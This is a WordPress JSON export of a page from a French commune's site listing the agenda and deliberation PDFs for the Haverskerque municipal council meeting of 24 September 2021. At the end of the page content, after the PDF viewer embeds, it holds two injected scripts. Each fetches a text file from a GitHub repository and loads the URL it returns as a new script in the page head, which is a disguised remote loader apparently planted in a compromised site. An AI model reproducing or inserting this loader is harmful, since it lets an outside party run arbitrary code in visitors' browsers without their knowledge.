{"id":641,"date":"2021-09-25T16:49:00","date_gmt":"2021-09-25T14:49:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=641"},"modified":"2024-07-29T06:38:57","modified_gmt":"2024-07-29T04:38:57","slug":"conseil-municipal-du-24-septembre-2021","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2021\/09\/25\/conseil-municipal-du-24-septembre-2021\/","title":{"rendered":"Conseil Municipal du 24 Septembre 2021"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">ORDRE DU JOUR<\/h3>\n\n\n\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 juin 2021.<br><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/www.haverskerque.fr\/local\/cache-vignettes\/L8xH11\/puce-32883.gif\" width=\"8\" height=\"11\" alt=\"-\">&nbsp;Informations au Conseil Municipal<\/p>\n\n\n\n<p><strong>INSTITUTION<\/strong><\/p>\n\n\n\n<p>1. Proc\u00e8s-verbal d\u2019installation d\u2019un nouveau conseiller municipal suite \u00e0 d\u00e9mission.<\/p>\n\n\n\n<p>INTERCOMMUNALIT\u00c9<\/p>\n\n\n\n<p>2. A\u00e9rodrome de Merville-Calonne &#8211; Transfert de comp\u00e9tence de l\u2019exploitation et de la propri\u00e9t\u00e9 de l\u2019a\u00e9rodrome.<br>3. Dispositifs culturels de la CCFL &#8211; Adh\u00e9sion de principe de la commune pour la dur\u00e9e du mandat.<\/p>\n\n\n\n<p><strong>FINANCES<\/strong><\/p>\n\n\n\n<p>4. Budget principal de la ville 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b02.<br>5. Modification des tarifs 2021 &#8211; Suppression de la majoration du service de garderie.<br>6. Don au CCAS de Merville &#8211; Dons de mat\u00e9riel.<br>7. Fonds de concours CCFL 2021 &#8211; Sollicitation au titre des d\u00e9penses d\u2019investissements.<br>8. Spectacles \u00e0 1\u20ac 2021 &#8211; Prise en charge communale des d\u00e9penses.<br>9. Taxe fonci\u00e8re sur les propri\u00e9t\u00e9s b\u00e2ties &#8211; Fixation du taux d\u2019exon\u00e9ration \u00e0 40%.<br>10. Taxe d\u2019am\u00e9nagement &#8211; Fixation du taux \u00e0 1% pour l\u2019ann\u00e9e 2021.<\/p>\n\n\n\n<p><strong>URBANISME<\/strong><\/p>\n\n\n\n<p>11. Acquisition par r\u00e9trocession \u00e0 l\u2019euro symbolique &#8211; Voiries cadastr\u00e9es A1877 et A1835.<\/p>\n\n\n\n<p><strong>ADMINISTRATION G\u00c9N\u00c9RALE<\/strong><\/p>\n\n\n\n<p>12. R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire &#8211; Modification au 1er octobre 2021.<br>13. Pr\u00e9vention des chats errants &#8211; Autorisation de signature de la convention avec l\u2019association Chatvabien.<\/p>\n\n\n\n<p><strong>RESSOURCES HUMAINES<\/strong><\/p>\n\n\n\n<p>14. Remplacement d\u2019agent public momentan\u00e9ment indisponible.<br>15. Activit\u00e9s extrascolaires &#8211; Ateliers danse &#8211; Nomination et r\u00e9mun\u00e9ration.<br>16. Activit\u00e9s sportives et musicales en milieu scolaire &#8211; Nomination et r\u00e9mun\u00e9ration.<br>17. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er octobre 2021.<br>18. Action sociale du personnel &#8211; D\u00e9signation du.de la d\u00e9l\u00e9gu\u00e9.e \u00e9lu.e de la commune aupr\u00e8s du Comit\u00e9 National d\u2019Action Sociale (CNAS) \u00e0 compter du 1er janvier 2021.<br>19. Attribution de ch\u00e8ques Cadhoc pour le personnel communal en 2021.<\/p>\n\n\n\n<p>Vous pouvez retrouver ci-dessous en PDF l\u2019ordre du jour de cette s\u00e9ance, son proc\u00e8s-verbal ainsi que l\u2019int\u00e9gralit\u00e9 des d\u00e9lib\u00e9rations prises\u00a0:<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2362\"  _slug=\"ordre-du-jour-de-la-seance-du-24-septembre-2021\" data-title=\"ordre-du-jour-de-la-seance-du-24-septembre-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Ordre du jour de la s\u00e9ance du 24 Septembre 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2362 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/convocation_cm_24_09_2021.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2359\"  _slug=\"compte-rendu-de-la-seance-du-24-septembre-2021\" data-title=\"compte-rendu-de-la-seance-du-24-septembre-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte-rendu de la s\u00e9ance du 24 Septembre 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2359 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces-verbal_de_la_seance_du_conseil_municipal_du_24_septembre_2021-tamponn.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2356\"  _slug=\"proces-verbal-dinstallation-dun-nouveau-conseiller-municipal-suite-a-demission\" data-title=\"proces-verbal-dinstallation-dun-nouveau-conseiller-municipal-suite-a-demission\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Proc\u00e8s-verbal d\u2019installation d\u2019un nouveau conseiller municipal suite \u00e0 d\u00e9mission<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2356 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces-verbal_d_installation_d_un_nouveau_conseiller_municipal_suite_a_demis_1_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2353\"  _slug=\"tableau-du-conseil-municipal\" data-title=\"tableau-du-conseil-municipal\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Tableau du conseil municipal<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2353 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/proces-verbal_d_installation_d_un_nouveau_conseiller_municipal_suite_a_demis.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2350\"  _slug=\"aerodrome-de-merville-calonne-transfert-de-competence-de-lexploitation-et-de-la-propriete-de-laerodrome\" data-title=\"aerodrome-de-merville-calonne-transfert-de-competence-de-lexploitation-et-de-la-propriete-de-laerodrome\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >A\u00e9rodrome de Merville-Calonne &#8211; Transfert de comp\u00e9tence de l\u2019exploitation et de la propri\u00e9t\u00e9 de l\u2019a\u00e9rodrome<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2350 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/aerodrome_de_merville-calonne_-_transfert_de_competence_de_l_exploitation_et.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2347\"  _slug=\"dispositifs-culturels-de-la-ccfl-adhesion-de-principe-de-la-commune-pour-la-duree-du-mandat\" data-title=\"dispositifs-culturels-de-la-ccfl-adhesion-de-principe-de-la-commune-pour-la-duree-du-mandat\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Dispositifs culturels de la CCFL &#8211; Adh\u00e9sion de principe de la commune pour la dur\u00e9e du mandat<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2347 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/dispositifs_culturels_de_la_ccfl_-_adhesion_de_principe_de_la_commune_pour_l.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2344\"  _slug=\"budget-principal-de-la-ville-2021-decision-budgetaire-modificative-n2\" data-title=\"budget-principal-de-la-ville-2021-decision-budgetaire-modificative-n2\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Budget principal de la ville 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b02<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2344 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/budget_principal_de_la_ville_2021_-_decision_budgetaire_modificative_no2-tam.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2341\"  _slug=\"modification-des-tarifs-2021-suppression-de-la-majoration-du-service-de-garderie\" data-title=\"modification-des-tarifs-2021-suppression-de-la-majoration-du-service-de-garderie\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Modification des tarifs 2021 &#8211; Suppression de la majoration du service de garderie<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2341 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/modification_des_tarifs_2021_-_suppression_de_la_majoration_du_service_de_ga.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2338\"  _slug=\"don-au-ccas-de-merville-dons-de-materiel\" data-title=\"don-au-ccas-de-merville-dons-de-materiel\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Don au CCAS de Merville &#8211; Dons de mat\u00e9riel<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2338 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/don_au_ccas_de_merville-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2335\"  _slug=\"fonds-de-concours-ccfl-2021-sollicitation-au-titre-des-depenses-dinvestissements\" data-title=\"fonds-de-concours-ccfl-2021-sollicitation-au-titre-des-depenses-dinvestissements\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Fonds de concours CCFL 2021 &#8211; Sollicitation au titre des d\u00e9penses d\u2019investissements<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2335 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/fonds_de_concours_ccfl_2021_-_sollicitation_au_titre_des_depenses_d_investis.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2332\"  _slug=\"spectacles-a-1e-2021-prise-en-charge-communale-des-depenses\" data-title=\"spectacles-a-1e-2021-prise-en-charge-communale-des-depenses\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Spectacles \u00e0 1\u20ac 2021 &#8211; Prise en charge communale des d\u00e9penses<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2332 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/spectacles_a_1_eur_2021_-_prise_en_charge_communale_des_depenses-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2329\"  _slug=\"fiscalite-fixation-du-taux-dexoneration-de-la-taxe-fonciere-sur-les-proprietes-baties-a-40\" data-title=\"fiscalite-fixation-du-taux-dexoneration-de-la-taxe-fonciere-sur-les-proprietes-baties-a-40\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Fiscalit\u00e9 &#8211; Fixation du taux d\u2019exon\u00e9ration de la taxe fonci\u00e8re sur les propri\u00e9t\u00e9s b\u00e2ties \u00e0 40%<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2329 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/fiscalite_-_fixation_du_taux_d_exoneration_de_la_taxe_fonciere_sur_les_propr.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2326\"  _slug=\"fiscalite-fixation-du-taux-de-la-taxe-damenagement-a-1-pour-2021\" data-title=\"fiscalite-fixation-du-taux-de-la-taxe-damenagement-a-1-pour-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Fiscalit\u00e9 &#8211; Fixation du taux de la taxe d\u2019am\u00e9nagement \u00e0 1% pour 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2326 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/fiscalite_-_fixation_du_taux_en_matiere_de_taxe_d_amenagement_communale-tamp.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2323\"  _slug=\"acquisition-par-retrocession-a-leuro-symbolique-voiries-cadastrees-a1877-et-a1835\" data-title=\"acquisition-par-retrocession-a-leuro-symbolique-voiries-cadastrees-a1877-et-a1835\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Acquisition par r\u00e9trocession \u00e0 l\u2019euro symbolique &#8211; Voiries cadastr\u00e9es A1877 et A1835<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2323 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/acquisition_par_retrocession_a_l_euro_symbolique_-_voiries_cadastrees_a1877_.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2320\"  _slug=\"reglement-interieur-du-service-periscolaire-modification-au-1er-octobre-2021\" data-title=\"reglement-interieur-du-service-periscolaire-modification-au-1er-octobre-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire &#8211; Modification au 1er octobre 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2320 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/reglement_interieur_des_services_periscolaires_-_modification_au_1er_octobre.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2317\"  _slug=\"deliberation-pour-remplacement-dun-agent-public-momentanement-indisponible\" data-title=\"deliberation-pour-remplacement-dun-agent-public-momentanement-indisponible\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >D\u00e9lib\u00e9ration pour remplacement d\u2019un agent public momentan\u00e9ment indisponible<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2317 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/remplacement_d_un_agent_public_momentanement_indisponible-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2314\"  _slug=\"activites-extrascolaires-ateliers-danse-nomination-et-remuneration\" data-title=\"activites-extrascolaires-ateliers-danse-nomination-et-remuneration\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Activit\u00e9s extrascolaires &#8211; Ateliers danse &#8211; Nomination et r\u00e9mun\u00e9ration<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2314 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/activites_extrascolaires_-_ateliers_danse_-_nomination_et_remuneration-tampo.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2311\"  _slug=\"activites-sportives-et-musicales-en-milieu-scolaire-nomination-et-remuneration\" data-title=\"activites-sportives-et-musicales-en-milieu-scolaire-nomination-et-remuneration\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Activit\u00e9s sportives et musicales en milieu scolaire &#8211; Nomination et r\u00e9mun\u00e9ration<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2311 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/activites_sportives_et_musicales_en_milieu_scolaire-_nomination_et_remunerat.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2308\"  _slug=\"tableau-des-effectifs-mise-a-jour-au-1er-octobre-2021\" data-title=\"tableau-des-effectifs-mise-a-jour-au-1er-octobre-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Tableau des effectifs &#8211; Mise \u00e0 jour au 1er octobre 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2308 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/tableau_des_effectifs_-_mise_a_jour_au_1er_octobre_2021-tamponne.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2305\"  _slug=\"action-sociale-du-personnel-designation-de-la-deleguee-elue-au-cnas\" data-title=\"action-sociale-du-personnel-designation-de-la-deleguee-elue-au-cnas\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Action sociale du personnel &#8211; D\u00e9signation de la d\u00e9l\u00e9gu\u00e9e \u00e9lue au CNAS<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2305 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/action_sociale_du_personnel_-_designation_du.de_la_delegue.e_elu.e_de_la_com.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><div class=\"_df_thumb \" id=\"df_2302\"  _slug=\"attribution-de-cheques-cadhoc-pour-le-personnel-communal-en-2021\" data-title=\"attribution-de-cheques-cadhoc-pour-le-personnel-communal-en-2021\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Attribution de ch\u00e8ques Cadhoc pour le personnel communal en 2021<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2302 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/19._attribution_de_cheques_cadhoc_pour_le_personnel_communal_en_2021-tamponn.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>ORDRE DU JOUR &nbsp;Approbation du proc\u00e8s-verbal du conseil municipal du 18 juin 2021.&nbsp;Informations au Conseil Municipal INSTITUTION 1. Proc\u00e8s-verbal d\u2019installation d\u2019un nouveau conseiller municipal suite \u00e0 d\u00e9mission. INTERCOMMUNALIT\u00c9 2. A\u00e9rodrome de Merville-Calonne &#8211; Transfert de comp\u00e9tence de l\u2019exploitation et de la propri\u00e9t\u00e9 de l\u2019a\u00e9rodrome.3. Dispositifs culturels de la CCFL &#8211; Adh\u00e9sion de principe de la commune pour la dur\u00e9e du mandat. FINANCES 4. Budget principal de la ville 2021 &#8211; D\u00e9cision budg\u00e9taire modificative n\u00b02.5. Modification des tarifs 2021 &#8211; Suppression de la majoration du service de garderie.6. Don au CCAS de Merville &#8211; Dons de mat\u00e9riel.7. Fonds de concours CCFL 2021 &#8211; Sollicitation au titre des d\u00e9penses d\u2019investissements.8. Spectacles \u00e0 1\u20ac 2021 &#8211; Prise en charge communale des d\u00e9penses.9. Taxe fonci\u00e8re sur les propri\u00e9t\u00e9s b\u00e2ties &#8211; Fixation du taux d\u2019exon\u00e9ration \u00e0 40%.10. Taxe d\u2019am\u00e9nagement &#8211; Fixation du taux \u00e0 1% pour l\u2019ann\u00e9e 2021. URBANISME 11. Acquisition par r\u00e9trocession \u00e0 l\u2019euro symbolique &#8211; Voiries cadastr\u00e9es A1877 et A1835. ADMINISTRATION G\u00c9N\u00c9RALE 12. R\u00e8glement int\u00e9rieur du service p\u00e9riscolaire &#8211; Modification au 1er octobre 2021.13. Pr\u00e9vention des chats errants &#8211; Autorisation de signature de la convention avec l\u2019association Chatvabien. RESSOURCES HUMAINES 14. Remplacement d\u2019agent public momentan\u00e9ment indisponible.15. Activit\u00e9s extrascolaires &#8211; Ateliers danse &#8211; Nomination et r\u00e9mun\u00e9ration.16. Activit\u00e9s sportives et musicales en milieu scolaire &#8211; Nomination et r\u00e9mun\u00e9ration.17. Tableau des effectifs &#8211; Mise \u00e0 jour au 1er octobre 2021.18. Action sociale du personnel &#8211; D\u00e9signation du.de la d\u00e9l\u00e9gu\u00e9.e \u00e9lu.e de la commune aupr\u00e8s du Comit\u00e9 National d\u2019Action Sociale (CNAS) \u00e0 compter du 1er janvier 2021.19. Attribution de ch\u00e8ques Cadhoc pour le personnel communal en 2021. Vous pouvez retrouver ci-dessous en PDF l\u2019ordre du jour de cette s\u00e9ance, son proc\u00e8s-verbal ainsi que l\u2019int\u00e9gralit\u00e9 des d\u00e9lib\u00e9rations prises\u00a0:<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-641","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 24 Septembre 2021 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" 